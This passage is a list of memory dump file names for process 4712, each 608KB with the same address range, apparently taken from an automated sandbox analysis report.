                                        • memory/4712-577-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-579-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-581-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-583-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-585-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-587-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-561-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-591-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-595-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-607-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-610-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-612-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-614-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-616-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-618-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-620-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-622-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-624-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-626-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-628-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-630-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)
                                        • memory/4712-558-0x0000000006B40000-0x0000000006BD8000-memory.dmp (Filesize: 608KB)